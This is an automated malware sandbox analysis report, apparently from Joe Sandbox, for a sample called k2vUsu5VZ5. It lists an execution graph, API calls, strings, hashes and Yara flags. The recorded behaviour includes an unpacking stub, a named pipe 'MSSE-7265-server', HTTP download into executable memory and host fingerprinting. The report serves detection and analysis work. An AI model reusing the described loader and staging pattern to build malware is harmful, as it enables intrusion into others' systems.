                execution_graph 32048 40e000 32049 40df95 32048->32049 32049->32048 32050 40e0c7 VirtualProtect VirtualProtect 32049->32050 32051 40e07d LoadLibraryA 32049->32051 32052 40e0a0 GetProcAddress 32049->32052 32054 40e130 32050->32054 32051->32049 32052->32049 32053 40e0c1 ExitProcess 32052->32053 32055 3496eeb 32056 3496f78 32055->32056 32059 34979eb 32056->32059 32058 3497018 32062 3497a25 32059->32062 32060 3497b1c VirtualAlloc 32061 3497b40 32060->32061 32061->32058 32062->32060 32062->32061 32063 389f9fc 32064 389fa18 32063->32064 32068 389fa1d 32063->32068 32077 38a7190 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 32064->32077 32066 389fa72 32067 389faa8 32067->32066 32123 38979cc 32067->32123 32068->32066 32068->32067 32078 389f89c 32068->32078 32071 389faef 32071->32066 32074 389f89c _CRT_INIT 118 API calls 32071->32074 32073 38979cc _DllMainCRTStartup 254 API calls 32075 389fae2 32073->32075 32074->32066 32076 389f89c _CRT_INIT 118 API calls 32075->32076 32076->32071 32077->32068 32079 389f92b 32078->32079 32083 389f8ae _heap_init 32078->32083 32080 389f981 32079->32080 32086 389f92f _CRT_INIT 32079->32086 32081 389f9e4 32080->32081 32082 389f986 32080->32082 32092 389f8b7 _CRT_INIT 32081->32092 32164 38a36c8 8 API calls 3 library calls 32081->32164 32163 38a1f5c TlsGetValue 32082->32163 32083->32092 32139 38a3870 43 API calls 6 library calls 32083->32139 32086->32092 32159 389deac 10 API calls free 32086->32159 32090 389f8c3 _RTC_Initialize 32090->32092 32097 389f8d3 GetCommandLineA 32090->32097 32091 389f957 32102 389f966 _CRT_INIT 32091->32102 32160 38a602c 9 API calls free 32091->32160 32092->32067 32096 389f961 32161 38a38f0 TlsFree _mtterm 32096->32161 32140 38a723c GetEnvironmentStringsW 32097->32140 32102->32092 32162 38a38f0 TlsFree _mtterm 32102->32162 32108 389f8f1 32110 389f8fc 32108->32110 32111 389f8f5 32108->32111 32155 38a6da0 54 API calls 3 library calls 32110->32155 32154 38a38f0 TlsFree _mtterm 32111->32154 32115 389f901 32116 389f915 32115->32116 32156 38a705c 53 API calls 4 library calls 32115->32156 32122 389f919 32116->32122 32158 38a602c 9 API calls free 32116->32158 32119 389f929 32119->32111 32120 389f90a 32120->32116 32157 389e02c 59 API calls 4 library calls 32120->32157 32122->32092 32124 3897a8d 32123->32124 32127 38979ee _DllMainCRTStartup 32123->32127 32233 3899a44 32124->32233 32126 3897a37 _DllMainCRTStartup 32173 388ca74 32126->32173 32127->32126 32130 3897a8b 32127->32130 32250 389b5c4 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 32127->32250 32130->32071 32130->32073 32131 3897a1a 32131->32126 32132 3897a29 32131->32132 32133 3897a71 32131->32133 32132->32126 32251 389b3d8 GetCurrentProcess VirtualFree _DllMainCRTStartup 32132->32251 32133->32126 32134 3897a7b 32133->32134 32253 389b220 GetCurrentProcess GetCurrentProcess UnmapViewOfFile _DllMainCRTStartup 32134->32253 32137 3897a59 32137->32126 32252 389b3d8 GetCurrentProcess VirtualFree _DllMainCRTStartup 32137->32252 32139->32090 32141 38a726a WideCharToMultiByte 32140->32141 32142 389f8e5 32140->32142 32144 38a730a FreeEnvironmentStringsW 32141->32144 32145 38a72b9 32141->32145 32153 38a5d00 14 API calls 2 library calls 32142->32153 32144->32142 32165 38a2668 38 API calls 2 library calls 32145->32165 32147 38a72c1 32147->32144 32148 38a72c9 WideCharToMultiByte 32147->32148 32149 38a72fc FreeEnvironmentStringsW 32148->32149 32150 38a72f1 32148->32150 32149->32142 32166 389d188 32150->32166 32152 38a72f9 32152->32149 32153->32108 32155->32115 32156->32120 32157->32116 32158->32119 32159->32091 32160->32096 32164->32092 32165->32147 32167 389d18d HeapFree 32166->32167 32171 389d1bd free 32166->32171 32168 389d1a8 32167->32168 32167->32171 32172 389fbcc 8 API calls _getptd_noexit 32168->32172 32170 389d1ad GetLastError 32170->32171 32171->32152 32172->32170 32254 389473c 32173->32254 32175 388ca92 _DllMainCRTStartup 32261 389d1c8 32175->32261 32177 388cb23 _DllMainCRTStartup 32278 389ca38 32177->32278 32179 388cb81 32180 389ca38 _DllMainCRTStartup 41 API calls 32179->32180 32181 388cb9b 32180->32181 32285 388eff8 32181->32285 32184 388cba4 32347 389ba2c 22 API calls 2 library calls 32184->32347 32186 388cba9 _DllMainCRTStartup 32187 388cbc0 32186->32187 32188 388cbc5 32186->32188 32348 389ba2c 22 API calls 2 library calls 32187->32348 32290 388ee30 32188->32290 32192 388cbda 32296 388eeac 32192->32296 32193 388cbd5 32349 389ba2c 22 API calls 2 library calls 32193->32349 32197 388cbe3 32350 389ba2c 22 API calls 2 library calls 32197->32350 32199 388cbe8 _DllMainCRTStartup 32200 389d1c8 malloc 38 API calls 32199->32200 32201 388cc15 32200->32201 32202 388cc1d 32201->32202 32203 388cc22 _DllMainCRTStartup 32201->32203 32351 389ba2c 22 API calls 2 library calls 32202->32351 32205 389ca38 _DllMainCRTStartup 41 API calls 32203->32205 32206 388cc3f _DllMainCRTStartup 32205->32206 32308 38943b0 GetACP 32206->32308 32234 389473c _DllMainCRTStartup 38 API calls 32233->32234 32235 3899a68 __crtGetStringTypeA_stat _DllMainCRTStartup 32234->32235 32236 389d1c8 malloc 38 API calls 32235->32236 32237 3899af5 __crtGetStringTypeA_stat 32236->32237 32238 389ca38 _DllMainCRTStartup 41 API calls 32237->32238 32239 3899b26 _DllMainCRTStartup 32238->32239 32241 3899b3d _DllMainCRTStartup 32239->32241 32419 388ec4c 32239->32419 32242 3899bd9 GetComputerNameA 32241->32242 32248 3899bfc __crtGetEnvironmentStringsW _DllMainCRTStartup 32241->32248 32423 3899e10 _DllMainCRTStartup 32242->32423 32244 3899dca 32424 3894830 8 API calls 2 library calls 32244->32424 32247 389d1c8 malloc 38 API calls 32247->32248 32248->32244 32248->32247 32249 389ca38 _DllMainCRTStartup 41 API calls 32248->32249 32249->32248 32250->32131 32251->32137 32252->32126 32253->32126 32255 389d1c8 malloc 38 API calls 32254->32255 32256 389475d 32255->32256 32257 389d1c8 malloc 38 API calls 32256->32257 32260 3894765 __crtGetStringTypeA_stat _DllMainCRTStartup 32256->32260 32258 3894771 32257->32258 32259 389d188 free 8 API calls 32258->32259 32258->32260 32259->32260 32260->32175 32262 389d25c 32261->32262 32274 389d1e0 32261->32274 32358 389fc68 DecodePointer 32262->32358 32264 389d261 32359 389fbcc 8 API calls _getptd_noexit 32264->32359 32265 389d218 HeapAlloc 32267 389d251 32265->32267 32265->32274 32267->32177 32269 389d241 32356 389fbcc 8 API calls _getptd_noexit 32269->32356 32273 389d1f8 32273->32265 32352 389fca4 34 API calls 2 library calls 32273->32352 32353 389fd18 34 API calls 7 library calls 32273->32353 32354 389de94 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 32273->32354 32274->32265 32274->32269 32274->32273 32275 389d246 32274->32275 32355 389fc68 DecodePointer 32274->32355 32357 389fbcc 8 API calls _getptd_noexit 32275->32357 32279 389ca8d __crtGetStringTypeA_stat 32278->32279 32280 389ca77 32278->32280 32279->32179 32281 389ca8f 32280->32281 32282 389ca83 32280->32282 32360 389f7c8 41 API calls 4 library calls 32281->32360 32283 389d1c8 malloc 38 API calls 32282->32283 32283->32279 32286 388f00c _DllMainCRTStartup 32285->32286 32287 388cba0 32286->32287 32288 388f012 GetLocalTime 32286->32288 32287->32184 32287->32186 32289 388f040 _DllMainCRTStartup 32288->32289 32289->32287 32292 388ee46 _DllMainCRTStartup 32290->32292 32291 388cbd1 32291->32192 32291->32193 32292->32291 32361 3898eac 63 API calls _DllMainCRTStartup 32292->32361 32294 388ee80 32362 3898ee4 62 API calls 3 library calls 32294->32362 32298 388eed1 _DllMainCRTStartup 32296->32298 32297 388cbdf 32297->32197 32297->32199 32298->32297 32299 388ef23 htonl htonl 32298->32299 32299->32297 32300 388ef43 32299->32300 32301 389d1c8 malloc 38 API calls 32300->32301 32302 388ef4d __crtGetEnvironmentStringsW _DllMainCRTStartup 32301->32302 32303 388efa3 __crtGetStringTypeA_stat 32302->32303 32363 3898eac 63 API calls _DllMainCRTStartup 32302->32363 32307 389d188 free 8 API calls 32303->32307 32305 388ef84 32364 3898ee4 62 API calls 3 library calls 32305->32364 32307->32297 32309 38943d8 getSystemCP 32308->32309 32365 3881218 32309->32365 32313 38943f8 __security_init_cookie 32314 38943fe GetTickCount 32313->32314 32371 389e38c 44 API calls _getptd 32314->32371 32316 389440f 32372 388cf2c CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime _DllMainCRTStartup 32316->32372 32318 3894414 _DllMainCRTStartup 32319 389443c GetCurrentProcess 32318->32319 32320 389444e 32318->32320 32409 388ff70 GetModuleHandleA GetProcAddress 32319->32409 32373 389be68 CheckTokenMembership FreeSid _DllMainCRTStartup 32320->32373 32322 389444a 32322->32320 32324 3894456 32374 388dfc0 htonl htonl 32324->32374 32326 389446c 32375 388df18 htonl __crtGetEnvironmentStringsW 32326->32375 32328 389447f 32376 388df18 htonl __crtGetEnvironmentStringsW 32328->32376 32330 389448f 32377 388df18 htonl __crtGetEnvironmentStringsW 32330->32377 32332 389449f 32378 388df60 htonl htonl _DllMainCRTStartup 32332->32378 32334 38944ae __security_init_cookie 32379 388df60 htonl htonl _DllMainCRTStartup 32334->32379 32336 38944bf 32380 388df90 htonl _DllMainCRTStartup 32336->32380 32338 38944ca 32381 388def8 htonl _DllMainCRTStartup 32338->32381 32340 38944d5 32382 3894578 32340->32382 32352->32273 32353->32273 32355->32274 32356->32275 32357->32267 32358->32264 32359->32267 32360->32279 32361->32294 32362->32291 32363->32305 32364->32303 32412 3881184 CryptAcquireContextA 32365->32412 32368 3881245 32370 3899684 38 API calls _DllMainCRTStartup 32368->32370 32370->32313 32371->32316 32372->32318 32373->32324 32374->32326 32375->32328 32376->32330 32377->32332 32378->32334 32379->32336 32380->32338 32381->32340 32383 389473c _DllMainCRTStartup 38 API calls 32382->32383 32384 38945a1 _DllMainCRTStartup 32383->32384 32385 3894605 GetComputerNameA 32384->32385 32418 388ec40 32385->32418 32409->32322 32413 38811c2 CryptAcquireContextA 32412->32413 32415 38811e6 _DllMainCRTStartup 32412->32415 32414 388120c 32413->32414 32413->32415 32414->32368 32417 38810d0 GetSystemTimeAsFileTime clock 32414->32417 32416 38811fd CryptReleaseContext 32415->32416 32416->32414 32417->32368 32420 388ec67 _DllMainCRTStartup 32419->32420 32421 388ec90 WSAIoctl 32420->32421 32422 388ec89 _DllMainCRTStartup 32420->32422 32421->32422 32422->32241 32423->32248 32425 38a7bac 32426 38a7bc1 32425->32426 32430 38a7bde 32425->32430 32427 38a7bcf 32426->32427 32426->32430 32433 389fbcc 8 API calls _getptd_noexit 32427->32433 32429 38a7bf6 HeapAlloc 32429->32430 32431 38a7bd4 32429->32431 32430->32429 32430->32431 32434 389fc68 DecodePointer 32430->32434 32433->32431 32434->32430 32435 160109 InternetConnectA 32436 160157 32435->32436 32438 160190 32436->32438 32440 1601c2 32436->32440 32443 160128 HttpOpenRequestA 32436->32443 32439 160331 InternetReadFile 32439->32440 32440->32439 32441 16030e VirtualAlloc 32440->32441 32442 160225 32440->32442 32441->32440 32445 16014f 32443->32445 32444 16030e VirtualAlloc 32444->32445 32445->32444 32446 160331 InternetReadFile 32445->32446 32447 16035a 32445->32447 32446->32445 32447->32436

                Executed Functions

                Function 0388E3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152networkfileCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • _snprintf.LIBCMT ref: 0388E43D
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                  • Part of subcall function 038961C0: _snprintf.LIBCMT ref: 0389632D
                • _snprintf.LIBCMT ref: 0388E497
                • _snprintf.LIBCMT ref: 0388E4AE
                • HttpOpenRequestA.WININET ref: 0388E4F3
                • HttpSendRequestA.WININET ref: 0388E524
                • InternetQueryDataAvailable.WININET ref: 0388E554
                • InternetCloseHandle.WININET ref: 0388E572
                • InternetReadFile.WININET ref: 0388E5AE
                • InternetCloseHandle.WININET ref: 0388E5CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                • String ID: %s%s$*/*
                • API String ID: 1419689450-856325523
                • Opcode ID: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
                • Instruction ID: 5cd7e850fe0510ad7fe75be1bcfe2d06c6fa35544e7e5eaf9688511052342339
                • Opcode Fuzzy Hash: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
                • Instruction Fuzzy Hash: 8D51F77270478186EB10EFA5F84079EB7A5F788B98F444162EE4D9BB18EF38D505CB00
                Function 00401180 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 205sleepstringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 65 401180-4011ae 66 401460-401463 GetStartupInfoA 65->66 67 4011b4-4011d1 65->67 71 401470-40148a call 402e88 66->71 68 4011e9-4011f4 67->68 69 4011f6-401204 68->69 70 4011d8-4011db 68->70 72 401417-401426 call 402e90 69->72 73 40120a-40120e 69->73 75 401400-401411 70->75 76 4011e1-4011e6 Sleep 70->76 82 401229-40122b 72->82 83 40142c-401447 _initterm 72->83 78 401490-4014a9 call 402e80 73->78 79 401214-401223 73->79 75->72 75->73 76->68 91 4014ae-4014d6 call 402e60 call 401990 call 401180 78->91 79->82 79->83 85 401231-40123e 82->85 86 40144d-401452 82->86 83->85 83->86 88 401240-401248 85->88 89 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 85->89 86->85 88->89 107 4012b2-4012b8 89->107 108 40129b 89->108 102 4014db-4014e1 91->102 110 4012a0-4012a2 107->110 111 4012ba-4012c8 107->111 109 4012f0-4012f6 108->109 112 4012f8-401302 109->112 113 40130e-401333 malloc 109->113 114 4012a4-4012a7 110->114 115 4012e9 110->115 116 4012ae 111->116 117 4013f0-4013f5 112->117 118 401308 112->118 119 401335-40133a 113->119 120 40137b-4013af call 401950 call 403040 113->120 121 4012d0-4012d2 114->121 122 4012a9 114->122 115->109 116->107 117->118 118->113 123 401340-401374 strlen malloc memcpy 119->123 131 4013b4-4013c2 120->131 121->115 125 4012d4 121->125 122->116 123->123 126 401376 123->126 128 4012d8-4012e2 125->128 126->120 128->115 130 4012e4-4012e7 128->130 130->115 130->128 131->91 132 4013c8-4013d0 131->132 132->71 133 4013d6-4013e5 132->133
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID: @P@
                • API String ID: 649803965-1136412694
                • Opcode ID: 8714a0a53b85a68ae96850f99c5d82bd34b46371170b9fae7742097e0e5346d9
                • Instruction ID: 77c4c0c2c4ec01c18778b245383d7dec7d454e94fa0d5fd388002b9db963459a
                • Opcode Fuzzy Hash: 8714a0a53b85a68ae96850f99c5d82bd34b46371170b9fae7742097e0e5346d9
                • Instruction Fuzzy Hash: C6818BB1601B0486EB259F56E99476A33A1F745B88F84803BDF48773A1DF7CC884C748
                Function 03894578 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                • String ID: %s%s%s
                • API String ID: 1671524875-1891519693
                • Opcode ID: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
                • Instruction ID: 1bfa0676650ac73d1b8238f0a7495b2d2245a1c34c681fd6a1136a3e29c60173
                • Opcode Fuzzy Hash: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
                • Instruction Fuzzy Hash: 6A41F46970478146EE05FBA7B81472BA795FB89FD4F5881A1AE458FB98CF3CC0478701
                Function 03881184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 338 3881184-38811c0 CryptAcquireContextA 339 38811c2-38811e4 CryptAcquireContextA 338->339 340 38811e6-38811f9 call 38b0020 338->340 339->340 341 388120c-3881216 339->341 344 38811fb 340->344 345 38811fd-388120a CryptReleaseContext 340->345 344->345 345->341
                APIs
                • CryptAcquireContextA.ADVAPI32 ref: 038811B8
                • CryptAcquireContextA.ADVAPI32 ref: 038811DC
                • CryptGenRandom.ADVAPI32 ref: 038811F0
                • CryptReleaseContext.ADVAPI32 ref: 03881204
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Context$Acquire$RandomRelease
                • String ID: ($Microsoft Base Cryptographic Provider v1.0
                • API String ID: 685801729-4046902070
                • Opcode ID: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
                • Instruction ID: 01093ab293d9b9556ca5de3900fbc488dd3ad8d1ce7ee7e2b488450b27077666
                • Opcode Fuzzy Hash: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
                • Instruction Fuzzy Hash: 4D015A76704B4682E710CFAAE88875AF765F7C8B84F888065EA4983765CF78C64AC740
                Function 00401630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50pipefileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 346 401630-40168d CreateNamedPipeA 347 4016dc-4016e5 346->347 348 40168f-4016a1 ConnectNamedPipe 346->348 348->347 349 4016a3-4016a5 348->349 350 4016c6-4016cf CloseHandle 349->350 351 4016a7-4016c4 WriteFile 349->351 350->347 351->350 352 4016d1-4016da 351->352 352->349
                APIs
                Strings
                • \\.\pipe\MSSE-7265-server, xrefs: 0040164F
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                • String ID: \\.\pipe\MSSE-7265-server
                • API String ID: 2239253087-1889910488
                • Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                • Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
                • Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                • Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08
                Function 0040DF90 Relevance: 6.2, APIs: 4, Instructions: 163librarymemoryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 370 40df90-40df93 371 40df9d-40dfa1 370->371 372 40dfa3-40dfab 371->372 373 40dfad 371->373 372->373 374 40df95-40df9a 373->374 375 40dfaf 373->375 374->371 376 40dfb2-40dfb9 375->376 378 40dfc5 376->378 379 40dfbb-40dfc3 376->379 378->376 380 40dfc7-40dfca 378->380 379->378 381 40dfcc-40dfda 380->381 382 40dfdf-40dfec 380->382 383 40e016-40e031 381->383 384 40dfdc 381->384 392 40e006-40e014 call 40df52 382->392 393 40dfee-40dff0 382->393 385 40e062-40e065 383->385 384->382 387 40e067-40e068 385->387 388 40e06a-40e070 385->388 390 40e049-40e04d 387->390 391 40e077-40e07b 388->391 394 40e033-40e036 390->394 395 40e04f-40e052 390->395 396 40e0c7-40e135 VirtualProtect * 2 call 40e14a 391->396 397 40e07d-40e095 LoadLibraryA 391->397 392->371 399 40dff3-40dffa 393->399 394->388 400 40e038 394->400 395->388 403 40e054-40e058 395->403 413 40e13a-40e13f 396->413 398 40e097-40e09e 397->398 398->391 404 40e0a0-40e0b6 GetProcAddress 398->404 414 40e004 399->414 415 40dffc-40e002 399->415 405 40e039-40e03d 400->405 403->405 408 40e05a-40e061 403->408 409 40e0c1 ExitProcess 404->409 410 40e0b8-40e0bf 404->410 405->390 412 40e03f-40e041 405->412 408->385 410->398 412->390 416 40e043-40e047 412->416 413->413 417 40e141-40f044 413->417 414->392 414->399 415->414 416->390 416->395
                APIs
                • LoadLibraryA.KERNEL32 ref: 0040E08F
                • GetProcAddress.KERNEL32 ref: 0040E0AD
                • VirtualProtect.KERNELBASE(?,?,?,-00000003), ref: 0040E0F2
                • VirtualProtect.KERNELBASE ref: 0040E110
                Memory Dump Source
                • Source File: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: ProtectVirtual$AddressLibraryLoadProc
                • String ID:
                • API String ID: 3300690313-0
                • Opcode ID: 6e10822fc425ce4a17b75e591643631d84c9e050e16756b2b447b2e25db0e5ea
                • Instruction ID: 8223ee606f915a237f54ec48d54bed82f464fbc4f52c26bf22d381cc6806c48b
                • Opcode Fuzzy Hash: 6e10822fc425ce4a17b75e591643631d84c9e050e16756b2b447b2e25db0e5ea
                • Instruction Fuzzy Hash: 3C418C72B501A145DB259BB5ED803E86710A7017B8F0C4B37DBB9677C6D6BC885BC308
                Function 00160109 Relevance: 4.7, APIs: 3, Instructions: 206networkCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 420 160109-160126 InternetConnectA 421 160181-160187 call 160128 420->421 424 1601c2-1601d8 421->424 425 160189-16018e 421->425 428 1601db-1601df 424->428 429 160208-16020b 424->429 426 160157 425->426 427 160190 425->427 426->421 432 1601e1-1601e4 428->432 433 16021b-16021e 428->433 430 160280-160288 429->430 431 16020d-160219 429->431 435 160289-16029a 430->435 431->433 436 1601e6-1601f2 432->436 437 16024f-160252 432->437 434 160220-160223 433->434 433->435 438 160254 434->438 439 160225-16024a 434->439 445 1602b9-1602c0 435->445 441 1601f4 436->441 442 160255-16025c 436->442 437->438 440 1601fa-160205 437->440 438->442 446 16024c 439->446 440->429 443 1601f6 441->443 444 16025f-160263 441->444 447 1602d1-1602d3 442->447 448 16025e 442->448 443->440 449 1602c6-1602ce 445->449 446->445 451 16024e 446->451 450 1602d4 447->450 448->444 448->446 452 1602d5-1602d6 450->452 453 160329-16032f 450->453 454 1602d0 452->454 455 1602d8-1602fd 452->455 456 160331-16034e InternetReadFile 453->456 454->447 454->450 455->449 457 1602ff-16030b 455->457 458 160306-160307 456->458 459 160350-160358 456->459 460 16030e-160328 VirtualAlloc 457->460 458->460 459->456 461 16035a-160364 459->461 460->453
                APIs
                • InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 00160124
                  • Part of subcall function 00160128: HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 00160143
                Memory Dump Source
                • Source File: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_160000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ConnectHttpInternetOpenRequest
                • String ID:
                • API String ID: 1341064763-0
                • Opcode ID: 49c3c1a397a546ca3137cb3f3a8aa769bddfb87c8d24a4b713d18e2e8d6569d4
                • Instruction ID: 55882e68d33602f6e7d57987d8e6dea50c7d33e191a51b7a166417253c3ecb44
                • Opcode Fuzzy Hash: 49c3c1a397a546ca3137cb3f3a8aa769bddfb87c8d24a4b713d18e2e8d6569d4
                • Instruction Fuzzy Hash: 5451EB3611D6D51FC7278B689DB53EB7B90FF4A315B28016CE09287183C7A1C966C34A
                Function 004017F8 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 54threadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • malloc.MSVCRT ref: 004017B9
                • SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                  • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                  • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                • GetTickCount.KERNEL32 ref: 004017FC
                • CreateThread.KERNEL32 ref: 00401885
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$\\.\pipe\MSSE-7265-server$e$i$p$p
                • API String ID: 3660650057-1669488359
                • Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                • Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
